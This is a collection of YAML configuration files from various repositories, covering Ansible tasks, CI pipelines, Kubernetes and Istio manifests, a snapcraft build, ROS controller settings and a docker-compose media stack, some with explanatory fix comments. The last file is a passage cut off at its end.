code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
# Clone the MineMeld web UI at the pinned release tag.
- name: minemeld-webui repo
  git:
    repo: "{{ webui_repo }}"
    clone: true            # canonical boolean, not "yes"
    dest: "{{ webui_repo_directory }}"
    version: "{{ minemeld_version }}"

# Rewrite git@github.com remotes to HTTPS so the following installs never
# try an interactive SSH fetch. ("<EMAIL>@github.com" in the original was a
# redaction artifact of git@github.com.)
- name: reconfiguring git to use https
  command: git config --global url."https://github.com".insteadOf git@github.com
- name: nodeenv
  pip:
    name: nodeenv

# "creates" makes this idempotent: the command is skipped once the
# virtualenv directory already exists.
- name: minemeld nodeenv
  command: nodeenv -v -n 4.2.6 --npm=2.14.7 --prebuilt -c {{ www_venv_directory }}
  args:
    creates: "{{ www_venv_directory }}"
# All node-tooling steps below run in the web UI checkout with the same
# environment. The environment map is anchored once (&node_env) and aliased
# so a PATH/NODE_PATH change only has to be made in one place; the original
# repeated the identical five-key map in every task.
- name: npm install
  command: npm install
  args:
    chdir: "{{ webui_repo_directory }}"
  environment: &node_env
    NODE_VIRTUAL_ENV: "{{ www_venv_directory }}"
    PATH: "{{ www_venv_directory }}/lib/node_modules/.bin:{{ www_venv_directory }}/bin:{{ webui_repo_directory }}/node_modules/.bin:{{ ansible_env.PATH }}"
    NODE_PATH: "{{ www_venv_directory }}/lib/node_modules"
    NPM_CONFIG_PREFIX: "{{ www_venv_directory }}"
    npm_config_prefix: "{{ www_venv_directory }}"

- name: bower install
  command: bower install --allow-root
  args:
    chdir: "{{ webui_repo_directory }}"
  environment: *node_env

- name: typings install
  command: typings install
  args:
    chdir: "{{ webui_repo_directory }}"
  environment: *node_env

- name: nsp check
  command: nsp check
  args:
    chdir: "{{ webui_repo_directory }}"
  environment: *node_env

- name: gulp build
  command: gulp build
  args:
    chdir: "{{ webui_repo_directory }}"
  environment: *node_env
# Hand the whole node environment to the minemeld service user.
- name: nodeenv permissions
  file:
    path: "{{ www_venv_directory }}"
    state: directory
    recurse: true
    owner: minemeld
    group: minemeld
    mode: "{{ file_permissions }}"

# Point the served "current" path at the freshly built dist/ output.
- name: minemeld-node-prototypes current link
  file:
    src: "{{ webui_repo_directory }}/dist"
    dest: "{{ www_directory }}/current"
    state: link
    owner: minemeld
    group: minemeld
|
roles/minemeld/tasks/webui.yml
|
trigger:
- master
pool:
vmImage: 'ubuntu-latest'
strategy:
matrix:
kibana_7_2_1:
kibana_version: 7.2.1
node_version: 10.15.2
kibana_7_3_0:
kibana_version: 7.3.0
node_version: 10.15.2
variables:
build_version: $(kibana_version)-$(Build.BuildNumber)
# https://www.elastic.co/guide/en/kibana/6.7/development-plugin-resources.html
# The Kibana directory must be named kibana, and your plugin directory must be
# located within the sibling kibana-extra folder, for example:
# .
# ├── kibana
# ├── kibana-extra/foo-plugin
# └── kibana-extra/bar-plugin
steps:
- checkout: self
path: kibana-extra/kibana-time-plugin
- task: NodeTool@0
displayName: 'Install Node.js'
inputs:
versionSpec: '$(node_version)'
- task: YarnInstaller@3
displayName: 'Install Yarn'
inputs:
versionSpec: '1.x'
- task: DockerInstaller@0
displayName: 'Install Docker'
inputs:
dockerVersion: '19.03.1'
- task: CmdLine@2
displayName: 'Clone Kibana'
inputs:
script: 'git clone --depth 1 --branch v$(kibana_version) https://github.com/elastic/kibana.git $(Pipeline.Workspace)/kibana'
- task: Yarn@3
displayName: 'Kibana bootstrap'
inputs:
arguments: 'run kbn bootstrap'
- task: Bower@0
displayName: 'Install bower dependencies'
inputs:
command: 'install'
bowerjson: 'bower.json'
- task: Yarn@3
displayName: 'Set plugin version'
inputs:
arguments: 'version --new-version $(build_version) --no-git-tag-version'
- task: CmdLine@2
displayName: 'Set Kibana version'
inputs:
script: mv package.json package.json.bak && jq '.kibana.version = "$(kibana_version)"' package.json.bak > package.json
- task: Yarn@3
displayName: 'Build plugin'
inputs:
arguments: 'run build'
- task: Docker@2
displayName: 'Test plugin installation'
inputs:
command: 'build'
arguments: |
--build-arg KIBANA_VERSION=$(kibana_version)
--build-arg PLUGIN_VERSION=$(build_version)
- task: CopyFiles@2
displayName: 'Copy build artifacts'
inputs:
sourceFolder: '$(Build.SourcesDirectory)/build'
contents: '*.zip'
targetFolder: '$(Build.ArtifactStagingDirectory)'
- task: PublishBuildArtifacts@1
displayName: 'Publish build artifacts'
inputs:
PathtoPublish: '$(Build.ArtifactStagingDirectory)'
ArtifactName: 'drop'
publishLocation: 'Container'
- task: GitHubRelease@0
displayName: 'Publish master'
condition: and(succeeded(), eq(variables['Build.SourceBranch'], 'refs/heads/master'))
inputs:
gitHubConnection: 'github.com_dwickern'
repositoryName: '$(Build.Repository.Name)'
action: 'create'
target: '$(Build.SourceVersion)'
tagSource: 'manual'
tag: '$(build_version)'
title: '$(build_version) (for Kibana $(kibana_version))'
assets: '$(Build.ArtifactStagingDirectory)/*.zip'
isPreRelease: true
changeLogCompareToRelease: 'lastFullRelease'
changeLogType: 'commitBased'
|
azure-pipelines.yml
|
apiVersion: v1
kind: Namespace
metadata:
labels:
env: prod
group: calert
name: calert
---
apiVersion: v1
data:
config.toml: |
# All timeouts and durations are in milliseconds.
[server]
address = ":6000"
socket = "/tmp/calert.sock"
name = "calert"
# WARNING If these timeouts are less than 1s,
# the server connection breaks.
read_timeout=5000
write_timeout=5000
keepalive_timeout=300000
[app]
template_file = "message.tmpl"
[app.http_client]
max_idle_conns = 100
request_timeout = 8000
[app.chat.alertManagerTestRoom]
notification_url = "https://chat.googleapis.com/v1/spaces/xxx/messages?key=abc-xyz&token=token-unique-key%3D"
[app.chat.awesomeRoomTwo]
notification_url = "https://chat.googleapis.com/v1/spaces/xxx/messages?key=abc-xyz&token=token-unique-key%3D"
kind: ConfigMap
metadata:
labels:
env: prod
group: calert
name: app-config-kf68kdh2b8
namespace: calert
---
apiVersion: v1
kind: Service
metadata:
labels:
env: prod
group: calert
name: calert-redis-calert
namespace: calert
spec:
ports:
- port: 6379
protocol: TCP
selector:
env: prod
group: calert
service: redis
tier: cache
---
apiVersion: v1
kind: Service
metadata:
labels:
env: prod
group: calert
name: calert-service
namespace: calert
spec:
ports:
- port: 6000
protocol: TCP
selector:
app: calert
env: prod
group: calert
tier: api
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    env: prod
    group: calert
  name: calert-app
  namespace: calert
spec:
  replicas: 1
  selector:
    matchLabels:
      env: prod
      group: calert
      service: app
  template:
    metadata:
      labels:
        # "app: calert" is required by the calert-service Service, whose
        # selector includes it — without this label the Service matched no
        # pods and the API was unreachable through it.
        app: calert
        env: prod
        group: calert
        service: app
        tier: api
    spec:
      containers:
        - image: mrkaran/calert:1.8.0-stable
          name: calert
          ports:
            - containerPort: 6000
          resources:
            limits:
              cpu: 500m
              memory: 400Mi
            requests:
              cpu: 250m
              memory: 200Mi
          volumeMounts:
            - mountPath: /etc/calert/
              name: config-dir
      volumes:
        - configMap:
            name: app-config-kf68kdh2b8
          name: config-dir
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
env: prod
group: calert
name: calert-redis
namespace: calert
spec:
replicas: 1
selector:
matchLabels:
env: prod
group: calert
service: redis
template:
metadata:
labels:
env: prod
group: calert
service: redis
tier: cache
spec:
containers:
- image: redis:5.0-alpine
name: redis
ports:
- containerPort: 6379
resources:
limits:
cpu: 300m
memory: 200Mi
requests:
cpu: 150m
memory: 100Mi
|
kustomize/build/deploy.yaml
|
version: 2
config_android: &config_android
docker:
- image: circleci/android:api-29
working_directory: ~/project
environment:
JAVA_TOOL_OPTIONS: "-Xmx1024m"
GRADLE_OPTS: "-Dorg.gradle.daemon=false -Dorg.gradle.workers.max=2 -Dkotlin.incremental=false -Dkotlin.compiler.execution.strategy=in-process"
TERM: dumb
# NOTE: this anchor is merged into a step via "- <<: *setup_ftl" in the
# run_ftl job, so it must be a *mapping* (like update_sdk below). The
# original wrapped it in a one-element sequence, which the "<<" merge key
# cannot merge.
setup_ftl: &setup_ftl
  run:
    name: Authorize gcloud and set config defaults
    command: |
      echo $GCLOUD_SERVICE_KEY | base64 -di > ${HOME}/gcloud-service-key.json
      sudo gcloud auth activate-service-account --key-file=${HOME}/gcloud-service-key.json
      sudo gcloud --quiet config set project ${GOOGLE_PROJECT_ID}
update_sdk: &update_sdk
run:
name: Update SDK
command: |
yes | sdkmanager --licenses || true
sdkmanager "platform-tools" "platforms;android-29"
jobs:
build_and_setup:
<<: *config_android
steps:
- <<: *update_sdk
- checkout
- run:
name: Build test and lint
command: |
./gradlew assembleStaging assembleStagingAndroidTest testDebugUnitTest testReleaseUnitTest lintDebug
- run:
name: Save test results
command: |
mkdir -p ~/junit/
find . -type f -regex ".*/build/test-results/.*xml" -exec cp {} ~/junit/ \;
when: always
- store_test_results:
path: ~/junit
- store_artifacts:
path: ~/junit
destination: tests
- store_artifacts:
path: ./mobile/build/reports
destination: reports/
- persist_to_workspace:
root: .
paths:
- ./mobile/build
run_ftl:
<<: *config_android
steps:
- attach_workspace:
at: .
- <<: *setup_ftl
- run:
name: Test with Firebase Test Lab
command: |
BUILD_DIR=build_${CIRCLE_BUILD_NUM}
sudo gcloud firebase test android run \
--app mobile/build/outputs/apk/staging/mobile-staging.apk \
--test mobile/build/outputs/apk/androidTest/staging/mobile-staging-androidTest.apk \
--results-bucket cloud-test-${GOOGLE_PROJECT_ID}-iosched \
--results-dir=${BUILD_DIR}
- run:
name: Download results
command: |
BUILD_DIR=build_${CIRCLE_BUILD_NUM}
sudo pip install -U crcmod
mkdir firebase_test_results
sudo gsutil -m mv -r -U `sudo gsutil ls gs://cloud-test-${GOOGLE_PROJECT_ID}-iosched/${BUILD_DIR} | tail -1` firebase_test_results/ | true
- store_artifacts:
path: firebase_test_results
workflows:
version: 2
build_and_test:
jobs:
- build_and_setup
- run_ftl:
requires:
- build_and_setup
|
.circleci/config.yml
|
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: todo-pvc
spec:
accessModes:
- "ReadWriteMany"
resources:
requests:
storage: "100Mi"
---
apiVersion: v1
kind: ConfigMap
metadata:
name: todo-postgres-configuration
labels:
app: todo-postgres
data:
POSTGRES_DB: todo
POSTGRES_USER: postgres
POSTGRES_PASSWORD: password
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: todo
spec:
  replicas: 1
  selector:
    matchLabels:
      app: todo
  template:
    metadata:
      labels:
        app: todo
    spec:
      volumes:
        - name: todo-postgresdb-storage
          persistentVolumeClaim:
            claimName: todo-pvc
      containers:
        - image: postgres:9.6.3
          name: my-database
          envFrom:
            - configMapRef:
                name: todo-postgres-configuration
          ports:
            - containerPort: 5432
          resources: {}
          volumeMounts:
            # ":Z" is a Docker/Podman SELinux relabel option, not valid in a
            # Kubernetes mountPath — it would mount at a literal "data:Z"
            # path and Postgres would never see the persistent volume.
            - mountPath: /var/lib/postgresql/data
              name: todo-postgresdb-storage
        - name: todo
          image: index.docker.io/cage1016/gokit-todo
          env:
            - name: QS_DB
              value: "todo"
            - name: QS_DB_HOST
              value: "localhost"
            - name: QS_DB_PASS
              value: "password"
            - name: QS_DB_PORT
              value: "5432"
            - name: QS_DB_SSL_CERT
              value: ""
            - name: QS_DB_SSL_KEY
              value: ""
            - name: QS_DB_SSL_MODE
              value: ""
            - name: QS_DB_SSL_ROOT_CERT
              value: ""
            - name: QS_DB_USER
              value: "postgres"
            - name: QS_GRPC_PORT
              value: "10121"
            - name: QS_HTTP_PORT
              value: "10120"
            - name: QS_LOG_LEVEL
              value: "info"
---
kind: Service
apiVersion: v1
metadata:
name: todo
spec:
selector:
app: todo
ports:
- port: 80
name: http
targetPort: 10120
- port: 8000
name: grpc
targetPort: 10121
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: frontend
labels:
app: frontend
spec:
replicas: 1
selector:
matchLabels:
app: frontend
template:
metadata:
labels:
app: frontend
spec:
containers:
- name: frontend
image: index.docker.io/cage1016/gokit-todo-frontend:latest
---
kind: Service
apiVersion: v1
metadata:
name: frontend
spec:
selector:
app: frontend
ports:
- port: 80
name: http
targetPort: 80
---
apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
name: todo-http-gateway
spec:
selector:
istio: ingressgateway # use istio default controller
servers:
- port:
number: 80
name: http
protocol: HTTP
hosts:
- "*"
---
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: todo-ingress-http
spec:
hosts:
- "*"
gateways:
- todo-http-gateway
http:
- match:
- uri:
prefix: /api/v1/todo/
rewrite:
uri: /
route:
- destination:
host: todo
port:
number: 80
- match:
- uri:
prefix: /
route:
- destination:
host: frontend
port:
number: 80
---
apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
name: todo-grpc-gateway
spec:
selector:
istio: ingressgateway
servers:
- hosts:
- "*"
port:
name: grpc
number: 443
protocol: HTTP
---
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: todo-ingress-grpc
spec:
hosts:
- "*"
gateways:
- todo-grpc-gateway
http:
- match:
- uri:
prefix: /pb.Todo
route:
- destination:
host: todo
port:
number: 8000
|
deployments/k8s-istio.yaml
|
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: giantswarm-admin
subjects:
- kind: User
name: {{.Cluster.Kubernetes.API.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
---
## Worker
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubelet
subjects:
- kind: User
name: {{.Cluster.Kubernetes.Kubelet.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:node
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: proxy
subjects:
- kind: User
name: {{.Cluster.Kubernetes.Kubelet.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:node-proxier
apiGroup: rbac.authorization.k8s.io
---
## Master
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kube-controller-manager
subjects:
- kind: User
name: {{.Cluster.Kubernetes.API.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:kube-controller-manager
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kube-scheduler
subjects:
- kind: User
name: {{.Cluster.Kubernetes.API.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:kube-scheduler
apiGroup: rbac.authorization.k8s.io
---
## node-operator
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-operator
subjects:
- kind: User
name: node-operator.{{.BaseDomain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: node-operator
apiGroup: rbac.authorization.k8s.io
---
## prometheus-external is prometheus from host cluster
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: prometheus-external
subjects:
- kind: User
name: prometheus.{{.BaseDomain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: prometheus-external
apiGroup: rbac.authorization.k8s.io
|
files/k8s-resource/rbac_bindings.yaml
|
items:
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
name: AsyncBatchAnnotateFilesResponse
id: AsyncBatchAnnotateFilesResponse
summary: |-
Response to an async batch file annotation request.
Generated from protobuf message <code>google.cloud.vision.v1.AsyncBatchAnnotateFilesResponse</code>
type: class
langs:
- php
children:
- \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::__construct()
- \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::getResponses()
- \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::setResponses()
properties:
- name: responses
description: |-
The list of file annotation responses, one for each request in
AsyncBatchAnnotateFilesRequest.
Generated from protobuf field <code>repeated .google.cloud.vision.v1.AsyncAnnotateFileResponse responses = 1;</code>
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::__construct()
name: __construct
id: __construct
summary: Constructor.
parent: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
type: method
langs:
- php
parameters:
- type: array
name: data
description: '{ Optional. Data for populating the Message object. @type
\Google\Cloud\Vision\V1\AsyncAnnotateFileResponse[]|\Google\Protobuf\Internal\RepeatedField
$responses The list of file annotation responses, one for each request
in AsyncBatchAnnotateFilesRequest. }'
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::getResponses()
name: getResponses
id: getResponses
summary: |-
The list of file annotation responses, one for each request in
AsyncBatchAnnotateFilesRequest.
Generated from protobuf field <code>repeated .google.cloud.vision.v1.AsyncAnnotateFileResponse responses = 1;</code>
parent: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
type: method
langs:
- php
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::setResponses()
name: setResponses
id: setResponses
summary: |-
The list of file annotation responses, one for each request in
AsyncBatchAnnotateFilesRequest.
Generated from protobuf field <code>repeated .google.cloud.vision.v1.AsyncAnnotateFileResponse responses = 1;</code>
parent: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
type: method
langs:
- php
parameters:
- type: \Google\Cloud\Vision\V1\AsyncAnnotateFileResponse[]|\Google\Protobuf\Internal\RepeatedField
name: var
|
testdata/golden/V1.AsyncBatchAnnotateFilesResponse.yml
|
name: Gradr
on:
pull_request:
branches:
- master
jobs:
lint:
  name: audit code-style
  runs-on: ubuntu-latest
  strategy:
    matrix:
      # quoted so YAML never coerces the versions to floats
      python-version: ["2.7", "3.5", "3.6", "3.7", "3.8"]
  steps:
    - name: Checkout Repo
      uses: actions/checkout@v2
    - name: Prepare To Install
      uses: actions/setup-python@v1
      with:
        # setup-python reads "python-version"; the original passed
        # "node-version", which the action ignores, so the matrix value
        # never selected an interpreter.
        python-version: ${{ matrix.python-version }}
    - name: Install Deps
      run: |
        pip install flake8
        flake8 .
    - name: Run Audits
      run: yarn eslint ./src/
ch-1:
  needs: lint
  name: audit challenge 1
  runs-on: ubuntu-latest
  strategy:
    matrix:
      python-version: ["3.x"]
  steps:
    - name: Checkout Repo
      uses: actions/checkout@v2
    - name: Prepare To Install
      uses: actions/setup-python@v1
      with:
        # was "node-version", which setup-python silently ignores
        python-version: ${{ matrix.python-version }}
    - name: Install Deps
      run: |
        pip install flake8
        flake8 .
    - name: Prepare Audits
      uses: actions/checkout@v2
      with:
        repository: chalu/js-audits
        path: audits
    - name: Run Audits
      run: flake8 audits/ch-1
    - name: Report Audit Stats
      uses: ./.github/actions/ch-1
      if: always()
ch-2:
  needs: ch-1
  name: audit challenge 2
  runs-on: ubuntu-latest
  strategy:
    matrix:
      node-version: ["12.x"]
  steps:
    - name: Checkout Repo
      uses: actions/checkout@v2
    - name: Prepare To Install
      uses: actions/setup-node@v1
      with:
        node-version: ${{ matrix.node-version }}
    - name: Install Deps
      # the original also ran a bare "pip install" (no package name), which
      # exits non-zero and failed the step before yarn ever ran
      run: yarn add jest @babel/core @babel/preset-env babel-jest axios @actions/core @actions/github
    - name: Prepare Audits
      uses: actions/checkout@v2
      with:
        repository: chalu/js-audits
        path: audits
    - name: Run Audits
      run: npx jest audits/ch-2 --json --outputFile=audits/ch-2.json --noStackTrace
    - name: Report Audit Stats
      uses: ./.github/actions/ch-2
      if: always()
ch-3:
  needs: ch-2
  name: audit challenge 3
  runs-on: ubuntu-latest
  strategy:
    matrix:
      # the steps below read matrix.node-version (this job runs jest via
      # setup-node, mirroring ch-2); the original declared python-version
      # here, so setup-node received an empty version spec
      node-version: ["12.x"]
  steps:
    - name: Checkout Repo
      uses: actions/checkout@v2
    - name: Prepare To Install
      uses: actions/setup-node@v1
      with:
        node-version: ${{ matrix.node-version }}
    - name: Install Deps
      run: |
        pip install flake8
        flake8 .
    - name: Prepare Audits
      uses: actions/checkout@v2
      with:
        repository: chalu/js-audits
        path: audits
    - name: Run Audits
      run: npx jest audits/ch-3 --json --outputFile=audits/ch-3.json --noStackTrace
    - name: Report Audit Stats
      uses: ./.github/actions/ch-3
      if: always()
|
.github/workflows/gradr.yml
|
boxbot:
# Publish all joint states----------------------------------------
joint_state_controller:
type: joint_state_controller/JointStateController
publish_rate: 50
# Position controllers -------------------------------------------
left_shoulder_1_controller:
type: position_controllers/JointPositionController
joint: left_shoulder_1_joint
left_shoulder_2_controller:
type: position_controllers/JointPositionController
joint: left_shoulder_2_joint
left_elbow_controller:
type: position_controllers/JointPositionController
joint: left_elbow_joint
left_wrist_1_controller:
type: position_controllers/JointPositionController
joint: left_wrist_1_joint
left_wrist_2_controller:
type: position_controllers/JointPositionController
joint: left_wrist_2_joint
left_gripper_controller:
type: position_controllers/JointPositionController
joint: left_gripper_joint
left_gripper_mimic_controller:
type: position_controllers/JointPositionController
joint: left_gripper_prismatic_joint_2
right_shoulder_1_controller:
type: position_controllers/JointPositionController
joint: right_shoulder_1_joint
right_shoulder_2_controller:
type: position_controllers/JointPositionController
joint: right_shoulder_2_joint
right_elbow_controller:
type: position_controllers/JointPositionController
joint: right_elbow_joint
right_wrist_1_controller:
type: position_controllers/JointPositionController
joint: right_wrist_1_joint
right_wrist_2_controller:
type: position_controllers/JointPositionController
joint: right_wrist_2_joint
right_gripper_controller:
type: position_controllers/JointPositionController
joint: right_gripper_joint
right_gripper_mimic_controller:
type: position_controllers/JointPositionController
joint: right_gripper_prismatic_joint_2
gazebo_ros_control/pid_gains:
left_shoulder_1_joint: {p: 50.0, i: 0.1, d: 1.0}
left_shoulder_2_joint: {p: 50.0, i: 0.1, d: 1.0}
left_elbow_joint: {p: 50.0, i: 0.1, d: 1.0}
left_wrist_1_joint: {p: 50.0, i: 0.1, d: 1.0}
left_wrist_2_joint: {p: 50.0, i: 0.1, d: 1.0}
left_gripper_joint: {p: 50.0, i: 0.1, d: 1.0}
left_gripper_prismatic_joint_2: {p: 50.0, i: 0.1, d: 1.0}
right_shoulder_1_joint: {p: 50.0, i: 0.1, d: 1.0}
right_shoulder_2_joint: {p: 50.0, i: 0.1, d: 1.0}
right_elbow_joint: {p: 50.0, i: 0.1, d: 1.0}
right_wrist_1_joint: {p: 50.0, i: 0.1, d: 1.0}
right_wrist_2_joint: {p: 50.0, i: 0.1, d: 1.0}
right_gripper_joint: {p: 50.0, i: 0.1, d: 1.0}
right_gripper_prismatic_joint_2: {p: 50.0, i: 0.1, d: 1.0}
|
boxbot_control/config/boxbot_5dof_control.yaml
|
name: edgex-device-rfid-llrp
base: core18
version: "replace-me"
version-script: |
  # NOTE: "$(shell ...)" is GNU Make syntax, not sh — in a shell script it
  # tried to execute a nonexistent "shell" command and always fell back to
  # 0.0.0. Plain command substitution reads ./VERSION as intended.
  VERSION=$(cat ./VERSION 2>/dev/null || echo 0.0.0)
  echo $VERSION-$(date +%Y%m%d)+$(git rev-parse --short HEAD)
license: Apache-2.0
summary: EdgeX Device LLRP Micro Service
title: EdgeX Device LLRP Micro Service
description: |
The EdgeX Device LLRP service for connecting LLRP based RFID devices to EdgeX.
Initially the daemon in the snap is disabled - a device profile must be
provisioned externally with core-metadata or provided to device-rfid-llrp-go inside
"$SNAP_DATA/config/device-rfid-llrp-go/res" before starting.
# TODO: add armhf when the project supports this
architectures:
- build-on: amd64
- build-on: arm64
grade: stable
confinement: strict
# delhi: 0, edinburgh: 1, fuji: 2, geneva: 3
epoch: 3
apps:
device-rfid-llrp-go:
adapter: none
command: bin/device-rfid-llrp-go $CONFIG_PRO_ARG $CONF_ARG $REGISTRY_ARG
environment:
CONFIG_PRO_ARG: "-cp=consul.http://localhost:8500"
CONF_ARG: "--confdir=$SNAP_DATA/config/device-rfid-llrp-go/res"
REGISTRY_ARG: "--registry"
DEVICE_PROFILESDIR: "$SNAP_DATA/config/device-rfid-llrp-go/res"
daemon: simple
plugs: [network, network-bind]
parts:
go:
plugin: nil
source: snap/local
build-packages: [curl]
override-build: |
# use dpkg architecture to figure out our target arch
# note - we specifically don't use arch
case "$(dpkg --print-architecture)" in
amd64)
FILE_NAME=go1.15.2.linux-amd64.tar.gz
FILE_HASH=b49fda1ca29a1946d6bb2a5a6982cf07ccd2aba849289508ee0f9918f6bb4552
;;
arm64)
FILE_NAME=go1.15.2.linux-arm64.tar.gz
FILE_HASH=c8ec460cc82d61604b048f9439c06bd591722efce5cd48f49e19b5f6226bd36d
;;
# armhf)
# FILE_NAME=go1.15.2.linux-armv6l.tar.gz
# FILE_HASH=c12e2afdcb21e530d332d4994919f856dd2a676e9d67034c7d6fefcb241412d9
# ;;
# i386)
# FILE_NAME=go1.15.2.linux-386.tar.gz
# FILE_HASH=5a91080469df6b91f1022bdfb0ca75e01ca50387950b13518def3d0a7f6af9f1
# ;;
esac
# download the archive, failing on ssl cert problems
curl https://dl.google.com/go/$FILE_NAME -O
echo "$FILE_HASH $FILE_NAME" > sha256
sha256sum -c sha256 | grep OK
tar -C $SNAPCRAFT_STAGE -xf go*.tar.gz --strip-components=1
prime:
- "-*"
device-rfid-llrp-go:
source: .
plugin: make
build-packages: [git]
after: [go]
override-build: |
  cd $SNAPCRAFT_PART_SRC
  make build
  install -DT "./cmd/device-rfid-llrp-go" "$SNAPCRAFT_PART_INSTALL/bin/device-rfid-llrp-go"
  install -d "$SNAPCRAFT_PART_INSTALL/config/device-rfid-llrp-go/res/"
  # rewrite the log path and profiles dir in the packaged configuration so
  # they resolve inside the snap's writable areas at runtime
  cat "./cmd/res/configuration.toml" | \
    sed -e s:\"./device-rfid-llrp-go.log\":\'\$SNAP_COMMON/device-rfid-llrp-go.log\': \
        -e s:'ProfilesDir = \"./res\"':'ProfilesDir = \"\$SNAP_DATA/config/device-rfid-llrp-go/res\"': > \
    "$SNAPCRAFT_PART_INSTALL/config/device-rfid-llrp-go/res/configuration.toml"
  # quote the glob so the shell cannot expand *.yaml against the build cwd
  # before find receives it
  if [ "$(find ./cmd/res/ -maxdepth 1 -name '*.yaml' -print -quit)" ]; then
    for fpath in ./cmd/res/*.yaml; do
      fname=$(basename "$fpath")
      install -DT "./cmd/res/${fname}" \
        "$SNAPCRAFT_PART_INSTALL/config/device-rfid-llrp-go/res/${fname}"
    done
  fi
  install -DT "./Attribution.txt" \
    "$SNAPCRAFT_PART_INSTALL/usr/share/doc/device-rfid-llrp-go/Attribution.txt"
  install -DT "./LICENSE" \
    "$SNAPCRAFT_PART_INSTALL/usr/share/doc/device-rfid-llrp-go/LICENSE"
|
snap/snapcraft.yaml
|
---
- name: Get master-eligible nodes
set_fact:
master_eligible_nodes: |
{%- set res = [] -%}
{%- set master_eligible_hostnames = (groups['master'] if groups['master'] is defined else groups['data']) | sort -%}
{%- for master_eligible_hostname in master_eligible_hostnames -%}
{%- set _ = res.append({'hostname': master_eligible_hostname, 'ip': hostvars[master_eligible_hostname]['ansible_host']}) -%}
{%- endfor -%}
{{res}}
- name: master_eligible_nodes
debug: msg={{master_eligible_nodes}}
run_once: yes
## old - for reference.
#- name: Get elasticsearch hosts when DNS in use
# block:
# - name: Get all master/data nodes (when using DNS)
# set_fact:
# es_unicast_nodes: "[{% for node in query('inventory_hostnames','data,master', errors='ignore') | sort %}'{{ node }}.{{cluster_vars.dns_user_domain}}'{{',' if not loop.last else ''}}{% endfor %}]"
#
# - name: Get master-eligible nodes (when using DNS)
# set_fact:
# master_eligible_nodes: "{{ (groups['master'] if groups['master'] is defined else groups['data']) | map('regex_replace', '^(.*)$', '\\1.' + cluster_vars.dns_user_domain) | sort }}"
# when: (cluster_vars.dns_server is defined and cluster_vars.dns_server != "")
#
#- name: Get elasticsearch hosts when DNS not in use
# block:
# - name: Get all master/data nodes (when not using DNS)
# set_fact:
# es_unicast_nodes: "[{% for node in query('inventory_hostnames','data,master', errors='ignore') | sort %}'{{ hostvars[node]['ansible_host'] }}'{{',' if not loop.last else ''}}{% endfor %}]"
#
# - name: Get master-eligible nodes (when not using DNS)
# set_fact:
# master_eligible_nodes: "{{ (groups['master'] if groups['master'] is defined else groups['data']) | map('extract', hostvars, 'ansible_host') | sort }}"
# when: (cluster_vars.dns_server is not defined or cluster_vars.dns_server == "")
#
#- name: es_unicast_nodes
# debug: msg={{es_unicast_nodes}}
# run_once: yes
|
facts/tasks/main.yml
|
version: '2'
services:
# proxy:
# container_name: 'traefik'
# image: traefik:1.5
# restart: always
# ports:
# - '8600:80'
# networks:
# - proxy
# volumes:
# - '/var/run/docker.sock:/var/run/docker.sock'
# - './traefik.toml:/traefik.toml'
portainer:
image: portainer/portainer:latest
container_name: portainer
restart: always
ports:
- '9000:9000'
volumes:
- '/mnt/data/portainer:/data'
- '/var/run/docker.sock:/var/run/docker.sock'
media:
container_name: 'media'
image: madslundt/cloud-media-scripts
restart: always
privileged: true
devices:
- /dev/fuse
cap_add:
- CAP_MKNOD
- CAP_SYS_ADMIN
environment:
ENCRYPT_MEDIA: 0
PUID: 1000
PGID: 1000
volumes:
- '/mnt/data/media/unionfs:/local-media:shared'
- '/mnt/data/media/local:/local-decrypt:shared'
- '/mnt/data/media/config:/config'
- '/mnt/data/media/chunks:/chunks'
- '/mnt/data/media/db:/data/db'
- '/mnt/data/media/logs:/log'
rutorrent:
container_name: 'rutorrent'
image: linuxserver/rutorrent:latest
restart: always
depends_on:
- media
ports:
- '5000:5000'
- '51413:51413'
- '6881:6881/udp'
- '80:80'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/rutorrent/config:/config'
